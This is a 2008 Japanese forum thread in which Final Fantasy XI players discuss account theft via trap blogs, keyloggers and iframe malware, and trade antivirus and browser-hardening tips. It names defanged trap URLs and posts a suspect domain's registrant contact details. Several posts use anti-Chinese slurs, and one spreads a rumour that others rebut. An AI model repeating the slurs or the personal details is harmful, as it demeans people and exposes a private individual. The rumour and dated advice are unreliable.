すでにキーロガーなどが仕込まれてなければ
アンインストールしたら情報は漏れない。
ウィルスに感染してるか調べられないなら
PS2でパスワード変更をして、OSの再インストールしとき。

334 :既にその名前は使われています:2008/03/15(土) 18:40:39.70 ID:M1DiBH3o
>>332
分からなくて怖くて時間有るならフォーマット→再インストコンボマジお勧め。
明日休みで出かける用もないならFFしながらOS再インストしてればいいじゃん。

>>328
罠付きスレは昔にもあった気がする、ネトゲ狙いとかじゃなくてブラクラとかも。

335 :既にその名前は使われています:2008/03/15(土) 18:46:43.33 ID:Waas72RN
キーロガーって何かに引っかかる?
ウィルスとして感知される以外のタイプってあったっけ?

336 :既にその名前は使われています:2008/03/15(土) 18:51:27.14 ID:6XKSBp5p
Windowsupdateおすとページに飛んだあと固まるんだけどなんでだろ

337 :既にその名前は使われています:2008/03/15(土) 19:02:50.93 ID:88lC05aF
>>336
ああ、あのページすぐ混雑するんだよ。
空いてる時にアクセスするか
オートアップデート待つかしたほうがいいんじゃない。
恒常的にDOS攻撃でも食らってんのかね?w

338 :既にその名前は使われています:2008/03/15(土) 19:03:39.61 ID:C2cVupHk
ありがとうございます。

今日は時間がなく、明日は家を空けてしまうので、アンインストールとPS2でパスワードを変更してみます。

アンチウイルスはバスターを使っていますが、大丈夫でしょうか?
バスターは穴が多いと耳にしたので…。
WindowsUpdate、バスター共に最新の状態にし、バスターは3日ごとに検索を行っています。

339 :既にその名前は使われています:2008/03/15(土) 19:15:35.28 ID:EX3W9S/i
金曜夜にかならずパスワード替えるだけでも自衛になりそうだ。
トロイ仕込まれてたらそれも効果ないが。

340 :既にその名前は使われています:2008/03/15(土) 19:23:19.13 ID:Lh35v6rs
>>338
この前ウイルスバスターの製作会社である
トレンドマイクロのHPが改ざんされて
一部のページでウイルス仕込まれてたことがつい最近あった
ウイルスの中身はネトゲーの情報を盗み出すもので新聞にものった
アンチウイルスサイトでも安心しないように

341 :既にその名前は使われています:2008/03/15(土) 20:12:50.84 ID:6XKSBp5p
>>337
ありり。まさかそんなアホな理由だったとわ

342 :既にその名前は使われています:2008/03/15(土) 20:57:24.68 ID:M1DiBH3o
パーソナル・チェック天野氏、オンラインゲームの不正対策最新事情を紹介
最重要かつ安価な対策は「ユーザーへの啓蒙活動の強化」
ttp://www.watch.impress.co.jp/game/docs/20080315/amano.htm

ユーザーにとって都合の良い記事。

343 :既にその名前は使われています:2008/03/15(土) 22:28:24.59 ID:kclaiJU4
IEからOperaにしてみたんだけど、ブラウザの設定はこれだけで良いだろうか?
バージョンは9.26、Java・Javascript・iframeの無効
見慣れてないし、何か設定し忘れてないか不安だ


344 :既にその名前は使われています:2008/03/15(土) 22:53:49.40 ID:ySPAXNeT
>>338
自分もバスターだけど、他の自衛に気を配るようになったら
驚くほど感染しなくなった
期限切れるまで使うので問題ないと思うよ
それ以上に必要なのは自衛意識絶えず念頭においてる事かと

>>343
設定で非表示にしてれば、たぶん今まで普通に見れていた普通のサイト(安全な)が
あちこち以前みたいには表示されなくなるから 
設定効いてるなと実感するんじゃないかな
(公式系のサイトほどJVスクリプトやインラインフレーム多様してる) 

そんな時はその時だけ表示させたりと臨機応変に

345 :既にその名前は使われています:2008/03/16(日) 00:02:07.11 ID:XD+Rz95R
hoshu

346 :既にその名前は使われています:2008/03/16(日) 01:08:16.89 ID:HBt8XJPp
保守

347 :既にその名前は使われています:2008/03/16(日) 02:20:05.69 ID:2ZSmCLDY
hujio

348 :既にその名前は使われています:2008/03/16(日) 02:21:37.59 ID:3FSoiyKa

 |  (^o^)ノ | < おやすみー
 |\⌒⌒⌒ \
  \|⌒⌒⌒⌒|


349 :既にその名前は使われています:2008/03/16(日) 06:39:45.94 ID:3JZ5LaS4
啓蒙保守

350 :既にその名前は使われています:2008/03/16(日) 09:25:05.66 ID:Sje/ZfVs
hosyu

351 :既にその名前は使われています:2008/03/16(日) 09:47:41.84 ID:e1WsrWPX
あげてみる

352 :既にその名前は使われています:2008/03/16(日) 10:14:09.97 ID:CLxRNcXl
起きて飯食ったばっかでボーっとしてたから
嘘ニコニコアド踏みそうになったぜ

353 :既にその名前は使われています:2008/03/16(日) 12:26:07.95 ID:EBGOnu/0
ちょっと質問だけど、
PS3でFFやってる場合、
PS3のプラウザで情報見たりしてたら
危ないという事ある?

354 :既にその名前は使われています:2008/03/16(日) 13:18:14.54 ID:NQZi8LGX
>>353
今のところPS3用のウイルスは出回ってないから大丈夫だと思う
狙われにくさとしてはMacみたいなもんだ。使用者が少ないから狙われない。
PS3でのネットブラウズが普及したら危なくなるだろうけど

355 :既にその名前は使われています:2008/03/16(日) 15:20:31.18 ID:bPDz6Zpr
注意喚起あげ

356 :既にその名前は使われています:2008/03/16(日) 17:02:43.36 ID:8K+fUF5K
最近危険って言われてるFC2のエフエフ系ブログに
スポンサーサイト、みたいな見出しで空の記事が一番上に乗ってたんだけど
それも罠?今日2個ぐらい見たけど…

小心者なのでOS入れ直し中

357 :既にその名前は使われています:2008/03/16(日) 17:05:49.42 ID:v6WncTD/
それは更新しないで一定時間たつと自動的に載るやつじゃないかな

358 :既にその名前は使われています:2008/03/16(日) 17:09:49.93 ID:dQ0dwudX
それ仕様だよ
1ヶ月以上更新ないブログには自動的に広告記事がつく
記事の後ろの方に注意書きあったと思うんだが

359 :既にその名前は使われています:2008/03/16(日) 17:20:38.98 ID:52oLEWSy
バハムート
ナシュモにて一般PCっぽい名前を付けているが称号:天晶堂会員、ハルシオン+
ローグ針の定番組合せで釣っているので業者と判明。
Vesont、Nyem、Wanb

360 :既にその名前は使われています:2008/03/16(日) 18:16:31.86 ID:HBt8XJPp
>>359
それはこっち
RMT業者を通報しまくれ ver.10
http://live27.2ch.net/test/read.cgi/ogame/1204788506/

361 :既にその名前は使われています:2008/03/16(日) 19:32:19.64 ID:8K+fUF5K
>>357 >>358
そうなんですか!怖くてすぐ閉じちゃったから見てなかった…
思い切って聞いてみてよかった。本当にネ実の人は神様だ…ありがとうございます

362 :既にその名前は使われています:2008/03/16(日) 19:49:03.52 ID:Z9qxHOtt
>>361
でもその用心深さは大事

油断するとやはり怖いのがネット

363 :既にその名前は使われています:2008/03/16(日) 21:17:21.06 ID:E6/tu8nd
しっかしクソシナがネットを積極的に利用するようになってから
ネット内の危険度が一気に上がったよなぁ。
10年前なんてアングラや地下サイトみたいな余程危険な場所で
ない限り感染なんて殆どと言っていいくらいなかったってのに。
中国をインターネットから切り離して欲しいよ全く。


364 :既にその名前は使われています:2008/03/16(日) 21:25:36.25 ID:jQLW6O6X
PeerGuardian2でChainaFreeなインターネッツ^^

365 :既にその名前は使われています:2008/03/16(日) 21:35:32.40 ID:yvlyj19n
被害にあって2ヶ月経ったんだけどまだGMから連絡こねー
調査に数ヶ月かかるって言ってたけどほんと遅いな・・・

366 :既にその名前は使われています:2008/03/16(日) 22:07:32.15 ID:z+3jOAYI
催促した方がよくね?
こういうケースでは「こっちはちゃんと待ってるぞ」って姿勢を
見せるのが大事だってクレーマーのばっちゃが言ってた

367 :既にその名前は使われています:2008/03/16(日) 23:57:15.02 ID:HBt8XJPp
欲酒

368 :既にその名前は使われています:2008/03/17(月) 00:40:47.81 ID:xU9h26PP
保守

369 :既にその名前は使われています:2008/03/17(月) 01:30:16.93 ID:i1V5BhvL
>>365
そういうのは引継ぎされてなかったらそこでストップされてるので
再度呼び出して状況を確認すべし
■eもそれができないならサポートとかGMとか軽々しく名乗るなというお話し

370 :既にその名前は使われています:2008/03/17(月) 03:06:47.81 ID:4DKMml4M
おやすみ揚げ

371 :既にその名前は使われています:2008/03/17(月) 03:33:52.74 ID:o7JPOwuC
PeerGuardian2を入れたらアニメ・ゲーム系のウィキペディアでよく引っ掛かるんだけど
これってウィルス仕込まれてるって事? ちなみに弾いたのはKorea

372 :既にその名前は使われています:2008/03/17(月) 03:37:34.63 ID:yYzn3a5T
Wikiの鯖は韓国、韓国IPをブロックしてるのならそりゃ弾くでしょ。
ウイルスとかは多分無い、外部リンクをクリックした場合の保障はできんがな。


373 :既にその名前は使われています:2008/03/17(月) 03:38:32.01 ID:JMcCr3Xe
>>371
日本語版のウィキペディアのサーバが韓国にあるから


374 :既にその名前は使われています:2008/03/17(月) 04:29:02.69 ID:RYnFvK6+
ウィルス関係ないかもしれないが、ウィ気開こうとすると
ほぼ100%IEブラウザ固まる。強制終了せにゃならん・・・これはなぜ?

375 :既にその名前は使われています:2008/03/17(月) 07:03:49.74 ID:25HBVbOQ
あげー

376 :既にその名前は使われています:2008/03/17(月) 07:44:13.85 ID:db2J9daA
課金してないけどFC2閲覧しちゃったage

377 :既にその名前は使われています:2008/03/17(月) 08:05:08.82 ID:xU9h26PP
>>374
ブラクラでも仕掛けてあるんじゃね?

378 :既にその名前は使われています:2008/03/17(月) 10:14:00.94 ID:vO3y/plk
今フレンド登録しただけでPOLのパス
抜かれるみたいだから注意な!
これマジらしいぞ!

379 :既にその名前は使われています:2008/03/17(月) 10:41:43.03 ID:7t6XNzVf
ソース

380 :既にその名前は使われています:2008/03/17(月) 11:36:31.71 ID:JcE5Y4/G
>>379
スクエニはユーザーサイドに立った管理をせず、公式サイトと言えども信用に値しないから。

381 :既にその名前は使われています:2008/03/17(月) 11:44:40.49 ID:McbVlDPD
>>380
なら辞めればいい。
怪しいオンラインゲームはするなって、消費者保護センターからずっと言われ続けてるじゃないか。

382 :既にその名前は使われています:2008/03/17(月) 12:26:27.39 ID:OZ9iV9bI
公式落ちた? 重くて開かん

383 :既にその名前は使われています:2008/03/17(月) 13:45:05.81 ID:a8HwAfoW
>>378
フレンド登録しただけでパス抜きって??
どういうことだろ、教えて!

384 :既にその名前は使われています:2008/03/17(月) 14:38:24.26 ID:vO3y/plk
今それっぽいアカハックにあってた人がいて
スクエニもほぼ犯人は断定してるらしい。
確証をスクエニと警察で調査中。
フレ登録からなので、犯人は日本人。
確かに被害者の持っていた高額品を
バザーしていたのを多数に目撃されてる。

断定は現時点できないが、注意されたし。
伝聞なのでソースもなくてすまん。
ただアカハックされた本人が言ってたアイテムを
犯人と疑わしき奴がバザーしてたのは確認した。

385 :既にその名前は使われています:2008/03/17(月) 14:41:16.63 ID:McbVlDPD
>>384
おま、それただの噂じゃん。
伝聞ほど信用がないのはないのぜ?

386 :既にその名前は使われています:2008/03/17(月) 15:01:42.64 ID:LfD/BwWB
「被害者」は非女キャラだったりしねーだろうな^^;

387 :既にその名前は使われています:2008/03/17(月) 15:02:15.33 ID:M5kl9cnj
ででお鯖のWinoaのことか?これ

388 :既にその名前は使われています:2008/03/17(月) 15:28:27.33 ID:2unDwBb4
どういうからくりで、フレンド登録からパス抜かれるのだ?
いい加減な嘘を書き込むなよ。

389 :既にその名前は使われています:2008/03/17(月) 15:34:15.87 ID:vO3y/plk
手法がバレてないアカハックほど怖いものはないよ。
初めはみんなこんなレスで信じないからなぁ。
確かに信じられないなら無理に信じなくていいよ。
頭の片隅にでもネタとして置いておいて。
用心にはこしたことない。
ででお鯖でも、似たようなコトあったのか?

390 :既にその名前は使われています:2008/03/17(月) 15:35:57.56 ID:raGHlFOL
>>389
実はソーシャルハックでしたとかいうなよ?w

391 :既にその名前は使われています:2008/03/17(月) 15:39:31.50 ID:B5AdIeIS
>>389
煽るだけでソースなしの話を信用しろといわれてもな

392 :既にその名前は使われています:2008/03/17(月) 15:45:34.02 ID:McbVlDPD
>>389
システム面で解る奴が多数いるこのスレで、「たいかんw」や「聞いた話しwww」を信じろと言われても一蹴されるだけ。
てか、今一蹴されて「うわー知らないんだー」と、さらに誇示されても^^;としかだせんわ。

とにかくソース出せー

393 :既にその名前は使われています:2008/03/17(月) 15:48:39.75 ID:vO3y/plk
ソースが出たらそれこそ祭りになった後
じゃないかなー。
すまんが現時点ではソース無しの妄想と
同じレベルだな。すまんかった。

ROMに戻るわ。ごめんよ(つд`)

394 :既にその名前は使われています:2008/03/17(月) 16:07:37.51 ID:McbVlDPD
なんだ。結局暇つぶしの煽りか。

オンライン上で会っただけでパス抜きなんてシステム的に完全不可能。
会ってフレ登録しただけでは、住所が分かったって程度で、そこに入るには鍵が必須。それを知っているのは管理している■と本人のみ。
それで抜かれるなら、本人が教えたか、■が教えたかどちらかしかありえねー

どっちにしろ、フレ登録でパス抜かれるなんて、■に内通者がいないとできっこないし、そんな事会社としてあってはならないwwwww

395 :既にその名前は使われています:2008/03/17(月) 16:19:18.60 ID:NdwIDi1C
会社としてはあってはならない事なんて去年いっぱいあったろ

偽装関連とか、会社ではあってはならないことがぽんぽん出てきた。
あってはならないことだから、あるはずがないなんてやってる本人の
火消しにしか聞こえない。
以前もGMが不正やってたんだし、あり得ない話ではないだろ。

396 :既にその名前は使われています:2008/03/17(月) 16:28:07.05 ID:EdvYq9Nc
>>394
おまえむずかしく書きすぎwwww

つまりフレ登録ごときでパス抜かれるって社員が洩らしてるんだから
フレ登録だけなはずねーだろってことだろ。

たしかにゲームしてるだけで抜かれなきゃおかしいわなwww


397 :既にその名前は使われています:2008/03/17(月) 16:47:43.96 ID:URKwE6OA
>>389
俺も聞いた話だが、ネ実に書き込むだけでも
パス抜かれることがあるらしいよ。


398 :既にその名前は使われています:2008/03/17(月) 16:48:14.65 ID:OREw96XY
ttp://www.4gamer.net/games/000/G000000/20080314003/

4gamer.netでゲーム運営側にて行う不正アクセス対策ツールの記事。
とても参考になることが書いてあるのでおいてく。

・不正アクセス元の地域認証
・ゲームの接続状況と接続してきた地域を照らし合わせて不正アクセスか判断
・国内の中継地点の先まで特定できるシステムを開発中

自己防衛にも限界があるのはここで散々出ているんだし
ここまでできるソリューションが開発されているんだから
■eももう少し効率的な対策ができるようにして欲しいもんだな。

399 :既にその名前は使われています:2008/03/17(月) 16:50:55.94 ID:LePJSfHm
もうそれこのスレでも既出

400 :既にその名前は使われています:2008/03/17(月) 17:05:51.52 ID:7t6XNzVf
俺も聞いた話だけど公式HP見るだけでもパス抜かれることあるらしいよ

401 :既にその名前は使われています:2008/03/17(月) 17:12:31.12 ID:NY702PYr
なんかすごいことになってるんだな・・・
このスレ見てて自分も危ないかもって思ったから早速パス変えてくる!

402 :既にその名前は使われています:2008/03/17(月) 17:13:27.62 ID:L0YgFMbw
俺も噂で聞いた話だけどウィルスチェッカーの公式見に行くとウィルス仕込まれるらしい

403 :既にその名前は使われています:2008/03/17(月) 17:21:45.24 ID:sNasDmha
>>402
それ、ウィルスバスターの公式ページな。

ソースはこれ:http://itpro.nikkeibp.co.jp/article/NEWS/20080312/296070/
リンク踏むのが怖いなら、「Trendmicro ウィルス 仕込まれる」でぐぐると一発。

404 :既にその名前は使われています:2008/03/17(月) 17:38:38.66 ID:iSbf+cw4
ここ見るようになってブラウザ火狐+NoScriptに変えたんだが・・・
FFの公式、トピックしか見えなくて吹いたw

405 :既にその名前は使われています:2008/03/17(月) 17:43:42.04 ID:NWZ8vph6
企業になると当たり前のようにJava前提になってて困る

406 :既にその名前は使われています:2008/03/17(月) 17:45:58.97 ID:1daMfzIK
Windows Live OneCareでスキャンしてもウィルス出てこなかったんだけど、
ウィルスドクターってやつの無料スキャンしたらウィルス9個発見されたんだが・・

407 :既にその名前は使われています:2008/03/17(月) 17:49:15.02 ID:1kFnZEgw
OneCareはクソ
でも中華ドクターほどクソじゃなかったと思うがなぁ

408 :既にその名前は使われています:2008/03/17(月) 17:57:56.46 ID:1daMfzIK
でもなんかそのウィルスドクターってのも怪しいというかなんというか・・

あああ、困る


409 :既にその名前は使われています:2008/03/17(月) 17:59:57.18 ID:B5AdIeIS
>>408
心配ならカスペルスキーで

410 :既にその名前は使われています:2008/03/17(月) 18:00:03.98 ID:1kFnZEgw
Kasperskyのオンラインスキャンすればいいだろ

411 :既にその名前は使われています:2008/03/17(月) 18:06:15.85 ID:1daMfzIK
ありがとう!帰って早速やってみる。正直もう何を信じていいか分からん;;
だがお前等は信じる

412 :既にその名前は使われています:2008/03/17(月) 18:27:36.33 ID:z8/ZO2JA
カスペルスキーのオンラインスキャンをしようとしたら途中で止まった。
IEのセキュリティレベルを中にしてください。って出たんだけど
もともと中なんだYO。どーしろと?

413 :既にその名前は使われています:2008/03/17(月) 18:31:54.27 ID:Qaop0X6+
( ´3`)

414 :既にその名前は使われています:2008/03/17(月) 18:32:15.37 ID:B5AdIeIS
>>412
なんかカスタマイズな設定してるとか?

415 :既にその名前は使われています:2008/03/17(月) 18:36:57.32 ID:z8/ZO2JA
>414
うむ。よく見たらちょっとカスタマイズしてt
ありがとう。
というわけでもう1回チェックしてきます三 (lll´Д`)

もう何年もウィルスバスター使ってきたけど結果によっては乗り換えるかも。

416 :既にその名前は使われています:2008/03/17(月) 18:49:27.94 ID:L0YgFMbw
>403
マジレスされて俺の悲しみがマッハで有頂天になった

417 :既にその名前は使われています:2008/03/17(月) 18:50:23.97 ID:TQMBeUEV
最近垢ハックマジでやばそうなので
Peerguardian2を導入してみたんだけど、
FFしてるだけなのにたまに中国からの送信をブロックしてるんだが。
これってもう何かに感染してるのか・・・?
パス変えたほうがいいのかな・・・。

418 :既にその名前は使われています:2008/03/17(月) 19:02:19.69 ID:Bk9IXFvS
ヤプログドメインでも罠ブログの米きたぞ
ttp:■■yaplog.jp■Koyuko■

iframeで既出の罠URL埋め込んであった

419 :既にその名前は使われています:2008/03/17(月) 19:05:19.13 ID:4DKMml4M
>>417
履歴を表示>ブロックのあった日を選択>ブロックのタブ
でブロックしたIPを確認できるから、それをぐぐるなりしてまず調べるべし
ウィキペが韓国鯖だし一般のサイトでも台湾IPのこともあるよ。

420 :既にその名前は使われています:2008/03/17(月) 19:28:34.66 ID:TQMBeUEV
>>419
おお、ありがと〜。
クリックボードにコピーでIPコピってググると、
一応普通のサイトが引っかかるっぽい・・・?
WIKIが韓国鯖なのか。
ウィンドウモードでやってるんだけど、調べ物のために、
WIKI後ろでつけっぱにしてるから、これが原因なのかな?
まぁ垢ハックされてたらもうすでに無事じゃないだろうし、
とりあえず大丈夫なのかな〜。
SpybotとAVGでもなにも検出されないしなぁ。

421 :既にその名前は使われています:2008/03/17(月) 19:31:23.65 ID:LePJSfHm
ついでに言うと台湾や韓国にもWindows Updateの鯖があるからな

422 :既にその名前は使われています:2008/03/17(月) 19:47:51.25 ID:dEANFXh8
中華の罠ドメインを見つけたんで気をつけてくれよな!
Domain name: bluewoon■com

Registrant Contact:
lin guan xi
guanxi lin abc00623@163■com
05972882502 fax: 13860208056
fujianshenglongyanshixianlu28hao
longyan Fujian 364000
cn
Created: 2008-03-08

423 :既にその名前は使われています:2008/03/17(月) 19:56:18.69 ID:uYG9Czbe
スレチで申し訳ないが、
なんか、下のスレ開いたら、カスペで「トロイの木馬」の
警告が出たんだけど、うちだけかな。

【株安すげえwwww円高すげえwwww】

URLは、ヤバそうなので貼らないでおく。
怖いのでスレ内容は、見てない。

424 :423:2008/03/17(月) 20:13:18.22 ID:uYG9Czbe
カスペの誤認かも知れないが、マジだとヤバイと思ったので、
急いで投稿しちまった。
↑のスレは見ないほうがいいかも。

425 :既にその名前は使われています:2008/03/17(月) 20:30:59.43 ID:B5AdIeIS
>>424
レスでウイルスチェッカー引っかかるコードはっつける奴がたまにいる
実害は少ないいと思う


426 :既にその名前は使われています:2008/03/17(月) 20:33:52.74 ID:uYG9Czbe
>>425
なるほど。レスあり。

427 :既にその名前は使われています:2008/03/17(月) 20:36:17.10 ID:WwdotSIP
>>423
2chに直接ウイルス貼り付けることは出来ないぞ。
そんな機能が付いて無いからな。
罠リンク張られたとかそんなかんじじゃないの。

428 :既にその名前は使われています:2008/03/17(月) 21:04:44.40 ID:NWZ8vph6
トロイのプログラムソースの一部が書き込まれてるとそれを検知したノートン先生が怒るとかいうのは昔からある嫌がらせの一種である。

429 :既にその名前は使われています:2008/03/17(月) 21:20:27.44 ID:L0YgFMbw
Cシェルのスクリプトっぽいのがメール欄に書かれててそれにノートンが反応って嫌がらせは昔よく見たなw

430 :既にその名前は使われています:2008/03/17(月) 21:30:23.46 ID:NPlRSzYF
ラブレターなんかは今でもたまに見かけるなw
ノートン使いだった俺涙目だったは

431 :既にその名前は使われています:2008/03/18(火) 00:03:17.01 ID:F9Kq2TNY
banおめでとうスレ落ちたので焦って保守

432 :既にその名前は使われています:2008/03/18(火) 00:35:05.28 ID:oug738eB


433 :既にその名前は使われています:2008/03/18(火) 01:22:31.88 ID:NcFWNaqV
しゅ

434 :既にその名前は使われています:2008/03/18(火) 01:36:37.64 ID:k3yly/k7
RMT業者、購入者BANおめでとう!Part46
http://live27.2ch.net/test/read.cgi/ogame/1205771503/

435 :既にその名前は使われています:2008/03/18(火) 02:29:30.76 ID:Fc6V9Eki
FFメンテは各種ソフトのアップデートとウイルスチェックをやるいい機会
寝る前にやっときましょう

436 :既にその名前は使われています:2008/03/18(火) 02:32:26.09 ID:soLD71iz
FFAHトロイ検出されてわろたwwwwwwwwwwwwww
onecareうんこすぎwwwwwwwwwwwwwwww

437 :既にその名前は使われています:2008/03/18(火) 02:42:51.32 ID:AT9B625w
今ヤプログ系のブログみたら警告音が鳴ったんだがなんだろう・・・

438 :既にその名前は使われています:2008/03/18(火) 02:48:21.66 ID:XhCtKqXc
ヤプログでも出回ってるらしい。

439 :既にその名前は使われています:2008/03/18(火) 05:45:45.75 ID:yy32Df4z
ブラックリスト更新したage

440 :既にその名前は使われています:2008/03/18(火) 08:07:22.41 ID:F9Kq2TNY
現金持ってるヤツは専用クライアント用意しろ、
無い奴は課金停止してフォーマット→OS再インストールして状況改善されるまで待て。

ッて言う保守。

441 :既にその名前は使われています:2008/03/18(火) 10:02:21.96 ID:oug738eB


442 :既にその名前は使われています:2008/03/18(火) 11:22:33.48 ID:NcFWNaqV
しゅ

443 :既にその名前は使われています:2008/03/18(火) 12:50:11.78 ID:b8cgs+2B
いまAVGのフリー版使ってるんだけど、対策としてはこれじゃ足りない?
罠サイト踏んだときにちゃんと検出してはくれたんだけど、
ファイアウォール機能がないから別途入れたほうがいいとかどこかで聞いたんだが。

フリー最強の組み合わせ教えてください
ゲーム妨げない程度の軽さ、安定性も考慮したりすると。



444 :既にその名前は使われています:2008/03/18(火) 13:01:13.79 ID:oug738eB
>>443
【無料】 フリーセキュリティの組合せ 6
http://pc11.2ch.net/test/read.cgi/sec/1204693757/
【PFW】フリーファイアウォールベストスレPart15
http://pc11.2ch.net/test/read.cgi/sec/1200892526/
最強のPCセキュリティーコンボ(フリー限定) Part3
http://pc11.2ch.net/test/read.cgi/sec/1175726576/
【PFW】ファイアウォール総合
http://pc11.2ch.net/test/read.cgi/sec/1167117926/

辺り見て自分で研究汁。経験に勝る最強なし。

445 :既にその名前は使われています:2008/03/18(火) 14:05:29.54 ID:eep8T4HG
ZoneAlarmやOutpostみたいに、Proはまともだが
Freeはどうしようもないものもあるので注意な。
上記スレに出ているであろうmatousecのリークテストを参考に。

446 :既にその名前は使われています:2008/03/18(火) 15:07:49.17 ID:/H7ikP8D
対垢ハックに特化したいのならPG2でいいんじゃないかな
リネ資料室のブロックリストでサポートされてるし

447 :既にその名前は使われています:2008/03/18(火) 15:27:31.13 ID:njRasgau
課金ボイコットを広めよう!!
http://live27.2ch.net/test/read.cgi/ogame/1205810793/


448 :既にその名前は使われています:2008/03/18(火) 16:10:47.28 ID:PMSeEqXI
今までの罠系で、iframeで読み込ませるサイトが中華鯖ばっかな気がするけど
他国のって今までにあったっけ?
rarとかは米のレン鯖とかあったけどさ
そういうの詳しくないから分らんが、他国だとまずかったりするん?

449 :既にその名前は使われています:2008/03/18(火) 16:22:05.48 ID:1j1VO+YQ
今は中華鯖ばかりだがいずれ他国鯖を使い出すのはだろうな
おそらくそんなに時間は掛からないとおもうよ

450 :既にその名前は使われています:2008/03/18(火) 17:52:07.51 ID:BF4idaBL
うふふ

451 :既にその名前は使われています:2008/03/18(火) 19:08:16.94 ID:gYT3Yy72
>>448
ウイルスをばらまいてる鯖は全世界でも中国が50%を占めると言われてる。
有害サイト作ってても管理が甘く処分しないからやり放題らしいな。
ウイルス全般で言えばアメリカ、ロシア、オランダ等も多いようだが
とりあえずFF関連では中国のみ。今のところはの話だけど。

452 :既にその名前は使われています:2008/03/18(火) 19:17:03.15 ID:F9Kq2TNY
リネ2とかのトンネリングで逮捕した様な状況を作るために
中国の様なネット犯罪は一切協力しません、
ッて言うスタンスの国からのアクセスは弾いて欲しいな。

とりあえずそこからだろう。

453 :既にその名前は使われています:2008/03/18(火) 19:23:34.37 ID:6fqa9BMn
>>443
FFXIのアカハック(パス抜き)には例え有料でも効果があるか分からない。
AVG+peerguardian2がいいよ。
それと、ブラウザのjava scriptはオフをデフォにする。必要なサイトで
中身が安心な所は手動でオンにしたほうがいい。
Sleipnirならステータスバーをクリックするだけで見てる対象ページだけ
オンオフ設定出来ていい。

454 :既にその名前は使われています:2008/03/18(火) 19:38:19.07 ID:u4ddQA1e
>>436
よく聞く話だけど実際はトロイ出てこないよ?
なにか反応あったんなら具体的にトロイの内容書いてくれ。

455 :既にその名前は使われています:2008/03/18(火) 19:43:29.65 ID:k3yly/k7
似たような名前の罠サイト踏んだか、転売がばれると困る業者だろう

ものすごい間があいてしまってなんだかなぁ の巻き。
http://ginlog○blog○drecom○jp/

↑何故かエロパロ板のスレに貼られていたがこれもパス抜きだったっぽい
今は閉鎖されてる

456 :既にその名前は使われています:2008/03/18(火) 19:45:48.88 ID:Ntmz7CiR
peerguardian2ってVistaでも使えるんだろうか

457 :既にその名前は使われています:2008/03/18(火) 19:46:10.08 ID:053Ion95
Pandemoniumスレに垢ハック被害者出たって書き込みあるね

458 :既にその名前は使われています:2008/03/18(火) 19:55:57.02 ID:lqp65zww
>>455
このサイトすごい勢いでそこらじゅうのMMO板のスレ貼られているんだが



459 :既にその名前は使われています:2008/03/18(火) 20:12:41.13 ID:LToNTKNj
俺も以前、FFAHに掲載されてる広告を踏んでトロイをもらった。
ファイル名しか残ってない。
dbnetlibn.dll
d3dx9_25f.dll
海外のインターネットカジノの宣伝を強制で見せるIEのアドオンだったと思う。
フリーAVGで削除出来なくて、カスペの試用版で削除しようとしたけどダメで、
カスペの豚の鳴き声がうるさくて困った記憶がある。

460 :既にその名前は使われています:2008/03/18(火) 20:36:49.40 ID:u4ddQA1e
>>459
ああffxiah.comもiframeで広告打ってるけど
その広告にくっついてるってわけか。
恒常的にウイルス検出されず、思い出したようにスレで話題に出るのはそのせいだったのね。

ちなみにffxiah.comでは運営費を広告収入から捻出しているため
RMT広告を選別消去する意思はありませんと表明している。
RMT広告外したら採算割れしたのでという話だが、実際は・・・・?

461 :既にその名前は使われています:2008/03/18(火) 20:52:32.73 ID:39q0YvmJ
>>456
現状vista対応はしてなかったはず

462 :既にその名前は使われています:2008/03/18(火) 21:04:50.05 ID:Ntmz7CiR
>>461
ぐわー 対応して無いのか・・・  ありがとう!

463 :既にその名前は使われています:2008/03/18(火) 21:24:31.39 ID:oug738eB
>>462
lt;丶`∀´gt; PeerGuardian2 ★2 (`ハ´ )
http://pc11.2ch.net/test/read.cgi/sec/1129612402/
【韓国 中国】PeerGuardian 23【YBBを弾こう】
http://tmp7.2ch.net/test/read.cgi/download/1204341836/

辺りを見たらしあわせになれるかもしれない

464 :既にその名前は使われています:2008/03/18(火) 21:27:31.80 ID:M/DBgUog
PeerGuardian2というのは、ファイアウォールソフトの一種なんですか?

465 :既にその名前は使われています:2008/03/18(火) 21:29:36.43 ID:Ntmz7CiR
>>463
軽く流し読みしたんだが、RCは使えるってことなのだろうか!

ありがとう!幸せになれそうだ

466 :既にその名前は使われています:2008/03/18(火) 21:41:25.16 ID:4boS9Q9Y
>>464
/no

467 :既にその名前は使われています:2008/03/18(火) 21:49:19.31 ID:oug738eB
IP毎はできてもポート毎はできないからあくまで簡易的に

468 :既にその名前は使われています:2008/03/18(火) 21:57:54.46 ID:Ntmz7CiR
がー Liteってヤツか・・・。
まぁそれでもだいぶマシになるだろう   ありがとね!

早く対応してほしいなぁ・・・

469 :既にその名前は使われています:2008/03/18(火) 22:02:12.39 ID:oug738eB
>>468
どっちかにRC1 Testの日本語訳版をうぷろだに上げたっていうレス無かったけ?
そのブツが今もあるかは知らんけど

470 :既にその名前は使われています:2008/03/18(火) 22:50:35.12 ID:Ntmz7CiR
4号ってIndexアプロダかねぇ・・ 鯖落ちてるから確かめようが無いし、どうも削除されてるっぽいな

がーーー もうちょっと早く調べておけば
色々ありがとう!

471 :既にその名前は使われています:2008/03/18(火) 22:58:17.63 ID:6seialR/
いい事考えた
課金止めたらアカハックされないんじゃね!?

472 :既にその名前は使われています:2008/03/19(水) 00:12:43.71 ID:F+PUYGhE
フレンド登録でアカハックって、
ID分かれば 後は総アタックで割れる? 
んなきゃないかw

473 :既にその名前は使われています:2008/03/19(水) 00:26:15.97 ID:QTOnxHwz
>>471
止めてもPOLアカウントが生きていて、キャラ削除状態になっていない限り分らない。
PCにIDとパス入った状態なら普通に抜かれる。
課金はシナ人が1か月分払うことになるが・・・

止めていたにもかかわらず、登録していたクレジットカード使われて鯖移動代3000円払わせられてたケースもあるんだから。

474 :既にその名前は使われています:2008/03/19(水) 00:32:21.76 ID:j6dnDuvy
さて、こんなニュースがあった訳だが。
[セキュリティ]ニフティ、韓流コンテンツなどで改ざん被害、ウイルス感染の危険を警告
http://dailynews.yahoo.co.jp/fc/computer/internet_viruses/

ニフティ <3828> (和田一也社長)は、同社が運営するWebサイト「@nifty」のコンテンツの一部が不正に改ざんされ、
閲覧しただけでウイルス感染の危険があったと発表した。


手口といい、やっぱり福建中華一味だろうかね?
ニフティもどきドメインを取ったという件もあるしな。

ライブドアもどきドメインを多数取ったところにブログ乗っ取りがあった。
FC2もどきドメインを多数取ったところにテンプレ改竄騒ぎがあった。
今回はニフティもどきドメインを取ったところにコンテンツ改竄騒ぎ。
偶然とは思えんね。


